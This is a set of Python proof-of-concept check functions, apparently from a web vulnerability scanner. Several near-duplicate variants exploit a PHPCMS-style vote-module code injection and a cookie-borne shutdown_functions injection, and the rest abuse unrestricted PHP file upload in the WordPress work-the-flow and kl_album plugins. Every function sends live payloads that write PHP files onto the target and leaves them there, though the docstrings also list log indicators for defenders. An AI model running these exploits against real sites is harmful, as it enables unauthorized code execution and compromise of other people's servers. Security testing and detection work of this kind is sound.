def verify(cls, args):
    """Probe each vote subject for the vote-module code-execution flaw.

    For every subject id returned by ``cls.get_vote_links(args)`` the check
    POSTs a ``radio[]`` value carrying a PHP fragment to the ``a=post``
    action, requests the ``a=result`` page for the same subject, and then
    asks ``PhpVerify.check`` whether ``<target>/readme.php`` responds as
    expected.  ``args['success']`` is set on every path that reaches a
    subject id or finds none; ``args['poc_ret']['vul_url']`` is filled in
    only on a positive result.

    This check is not read-only: the fragment writes a file named
    ``readme.php`` (the base64 token in the payload is that name without
    padding).  Nothing in this function removes the file afterwards.
    What a defender sees in web logs is a POST to ``m=vote&c=index&a=post``
    followed by GETs of ``a=result`` and ``/readme.php``.

    NOTE(review): the listing arrived collapsed onto one line; the nesting
    below is reconstructed from the if/else pairing -- confirm against the
    original file.
    """
    target = args['options']['target']
    checker = PhpVerify()
    subject_ids = cls.get_vote_links(args)

    # No vote subjects discovered: nothing to probe.
    if not subject_ids:
        args['success'] = False
        return args

    for subject_id in subject_ids:
        post_url = target + (
            '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'
            % str(subject_id))
        if args['options']['verbose']:
            print('[*] Request URL: ' + post_url)

        form = {
            'subjectid': subject_id,
            'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                       '"%s");\x80' % checker.get_content()
        }
        # NOTE(review): neither request passes a timeout, so an
        # unresponsive target blocks the scan here.
        requests.post(post_url, data=form)
        result_url = target + (
            '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'
            % str(subject_id))
        requests.get(result_url)

        if checker.check(target + '/readme.php'):
            args['success'] = True
            args['poc_ret']['vul_url'] = args['options']['target']
            return args
        # This subject did not confirm; try the next one.
        args['success'] = False

    return args
def verify(cls, args):
    """Run the vote-module check against every discovered vote subject.

    Steps per subject id (taken from ``cls.get_vote_links(args)``):
    submit the crafted ``radio[]`` form field to the ``a=post`` action,
    fetch the ``a=result`` view for that subject, then let
    ``PhpVerify.check`` test ``<target>/readme.php``.  Returns ``args``
    with ``success`` set, and with ``poc_ret['vul_url']`` set to the
    target when the probe file answers.

    Side effect on the target: the submitted fragment creates
    ``readme.php``, and this function contains no step that deletes it
    (whether ``PhpVerify.check`` cleans up is not visible here).

    NOTE(review): indentation was lost in this listing; the block
    structure is the reading implied by the two ``else`` clauses --
    confirm against the original.
    """
    base = args['options']['target']
    verifier = PhpVerify()
    vote_ids = cls.get_vote_links(args)

    if not vote_ids:
        args['success'] = False
    else:
        for vote_id in vote_ids:
            submit_path = (
                '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'
                % str(vote_id))
            submit_url = base + submit_path
            if args['options']['verbose']:
                print('[*] Request URL: ' + submit_url)

            body = {
                'subjectid': vote_id,
                'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                           '"%s");\x80' % verifier.get_content()
            }
            # NOTE(review): no timeout on either call.
            requests.post(submit_url, data=body)

            result_path = (
                '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'
                % str(vote_id))
            requests.get(base + result_path)

            probe_url = base + '/readme.php'
            confirmed = verifier.check(probe_url)
            if not confirmed:
                args['success'] = False
                continue
            # First confirmation ends the scan of remaining subjects.
            args['success'] = True
            args['poc_ret']['vul_url'] = args['options']['target']
            return args
    return args
def verify(cls, args):
    """Check the target's vote module by planting and fetching a probe file.

    Iterates the subject ids from ``cls.get_vote_links(args)``.  Each
    iteration sends one POST (``a=post`` with a crafted ``radio[]`` field)
    and one GET (``a=result``), then calls ``PhpVerify.check`` on
    ``<target>/readme.php``.  Stops at the first subject that confirms.

    Returns ``args``; ``args["success"]`` is ``False`` when no ids were
    found or no subject confirmed, ``True`` otherwise.

    Operational caveat: a positive run leaves ``readme.php`` on the
    target, since no removal step appears in this function.  In verbose
    mode only the request URL is printed, not the submitted field.

    NOTE(review): block nesting reconstructed from a one-line listing --
    confirm against the original.
    """
    site = args["options"]["target"]
    php_probe = PhpVerify()
    found_ids = cls.get_vote_links(args)

    if found_ids:
        for sid in found_ids:
            sid_text = str(sid)
            post_target = (
                site
                + "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1"
                % sid_text
            )
            if args["options"]["verbose"]:
                print("[*] Request URL: " + post_target)

            fields = {
                "subjectid": sid,
                "radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"
                '"%s");\x80' % php_probe.get_content(),
            }
            # NOTE(review): requests are sent without a timeout.
            requests.post(post_target, data=fields)
            requests.get(
                site
                + "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1"
                % sid_text
            )

            if php_probe.check(site + "/readme.php"):
                args["success"] = True
                args["poc_ret"]["vul_url"] = args["options"]["target"]
                return args
            args["success"] = False
        return args

    # Empty or missing id list: report failure without sending anything.
    args["success"] = False
    return args
def verify(cls, args):
    """Send one cookie-borne probe and test for ``/inc/class_tester.php``.

    The ``shutdown_functions[0][arguments][]`` entry of ``cls.cookies`` is
    used as a format template: the base64 of ``PhpVerify.get_content()``
    is substituted in, the target is requested once with those cookies,
    and ``PhpVerify.check`` is then run against
    ``<target>/inc/class_tester.php``.  On a positive check
    ``args['success']`` and ``args['poc_ret']['vul_url']`` are set; on a
    negative one ``args`` is returned without touching ``success``.

    Log indicators for defenders: a GET carrying a cookie named
    ``shutdown_functions[0][arguments][]``, followed by a request for
    ``/inc/class_tester.php``.  No cleanup of that file happens here.

    NOTE(review): nesting reconstructed from a one-line listing; the
    final ``return`` is read as function-level -- confirm.
    """
    cookie_key = 'shutdown_functions[0][arguments][]'
    target = args['options']['target']
    probe_url = target + '/inc/class_tester.php'
    checker = PhpVerify()

    # NOTE(review): the expanded value is stored back on the dict reached
    # through `cls`, so after the first call the stored string is no longer
    # the template; a per-call copy would avoid changing shared state.
    template = cls.cookies[cookie_key]
    cls.cookies[cookie_key] = template.format(b64encode(checker.get_content()))

    if args['options']['verbose']:
        print('[*] Request URL: ' + target)
        print('[*] Payload Content: ' + cls.cookies[cookie_key])

    # NOTE(review): no timeout is passed to requests.get.
    requests.get(target, cookies=cls.cookies)

    if checker.check(probe_url):
        args['success'] = True
        args['poc_ret']['vul_url'] = target
    return args
def verify(cls, args):
    """Deliver the probe through a request cookie and report the outcome.

    Fills the ``shutdown_functions[0][arguments][]`` cookie template with
    the base64-encoded ``PhpVerify`` content, issues a single GET to the
    target with ``cls.cookies``, then checks
    ``<target>/inc/class_tester.php`` via ``PhpVerify.check``.

    Returns ``args`` with ``success`` set to ``True`` (and
    ``poc_ret['vul_url']`` set to the target) or ``False``.

    The probe file is written on the target as a side effect; this
    function has no step that removes it.  Verbose mode prints the full
    cookie value to stdout.
    """
    key = 'shutdown_functions[0][arguments][]'
    site = args['options']['target']
    tester_url = site + '/inc/class_tester.php'
    probe = PhpVerify()

    # NOTE(review): this overwrites the template held in cls.cookies, so
    # the placeholder is gone for any later call on the same class.
    encoded = b64encode(probe.get_content())
    cls.cookies[key] = cls.cookies[key].format(encoded)

    if args['options']['verbose']:
        print('[*] Request URL: ' + site)
        print('[*] Payload Content: ' + cls.cookies[key])

    # NOTE(review): no timeout is passed, so a silent target blocks here.
    requests.get(site, cookies=cls.cookies)

    if not probe.check(tester_url):
        args['success'] = False
        return args

    args['success'] = True
    args['poc_ret']['vul_url'] = site
    return args
def verify(cls, args):
    """Test the plugin's bundled upload handler for unrestricted upload.

    Uploads the ``PhpVerify`` content as ``info.php`` to the
    jQuery-File-Upload ``server/php/index.php`` endpoint shipped inside
    the work-the-flow-file-upload plugin, then fetches
    ``server/php/files/info.php`` and looks for the marker
    ``202cb962ac59075b964b07152d234b70`` (the MD5 of ``"123"``) in the
    body.  On a match ``args['success']`` and
    ``args['poc_ret']['vul_url']`` are set; otherwise ``args`` is returned
    as received.

    Side effect on the target: ``info.php`` stays in the plugin's
    ``files/`` directory, as nothing here deletes it.  Defenders can look
    for a multipart POST to the handler followed by a GET of
    ``files/info.php``.

    NOTE(review): nesting reconstructed from a one-line listing; the
    final ``return`` is read as function-level -- confirm.
    """
    marker = '202cb962ac59075b964b07152d234b70'
    target = args['options']['target']
    probe_body = PhpVerify().get_content()
    handler_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php' % target
    uploaded_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/info.php' % target

    if args['options']['verbose']:
        print('[*] Request url: ' + handler_url)
        print('[*] Upload file: ' + probe_body)

    # Both entries go through `files=`, so 'action' is sent as a multipart
    # part as well, exactly as in the original.
    parts = {
        'files': ('info.php', probe_body, 'application/octet-stream'),
        'action': 'upload'
    }
    # NOTE(review): neither request passes a timeout.
    requests.post(handler_url, files=parts)
    response = requests.get(uploaded_url)

    if marker in response.content:
        args['success'] = True
        args['poc_ret']['vul_url'] = handler_url
    return args
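def verify(cls, args):
    """Test the kl_album upload endpoint and confirm via the stored file.

    Posts the ``PhpVerify`` content as a multipart ``Filedata`` part to
    ``/content/plugins/kl_album/kl_album_ajax_do.php``, extracts the stored
    ``/content...php`` path from the response, requests that path, and
    looks for the marker ``202cb962ac59075b964b07152d234b70`` (the MD5 of
    ``"123"``).  On a match ``args['success']`` and
    ``args['poc_ret']['vul_url']`` are set.

    Returns ``args`` unchanged when the upload response contains no
    matching path or the marker is absent.

    Side effect on the target: the uploaded file is left in place, as no
    removal step exists here.  Defenders can look for a multipart POST to
    ``kl_album_ajax_do.php`` followed by a POST to a ``.php`` file under
    ``/content``.

    NOTE(review): nesting reconstructed from a one-line listing; the
    final ``return`` is read as function-level -- confirm.
    """
    url = args['options']['target']
    verify_url = '%s/content/plugins/kl_album/kl_album_ajax_do.php' % url
    php = PhpVerify().get_content()
    if args['options']['verbose']:
        print('[*] Request URL: ' + verify_url)
        print('[*] Upload File: ' + php)

    verify_file = {'Filedata': ('v%27.php', php), 'album': (None, '11111')}
    # NOTE(review): no timeout is passed to either request.
    content = requests.post(verify_url, files=verify_file).content

    # An explicit no-match test replaces the bare `except:`, which also
    # swallowed KeyboardInterrupt and hid unrelated errors on this line.
    match = re.search(r"..(/content.*?\.php)", content)
    if match is None:
        return args
    file_path = match.group(1)

    # check
    if args['options']['verbose']:
        print('[*] Checking...')
    check_content = requests.post(url + file_path).content
    if '202cb962ac59075b964b07152d234b70' in check_content:
        args['success'] = True
        args['poc_ret']['vul_url'] = verify_url
    return args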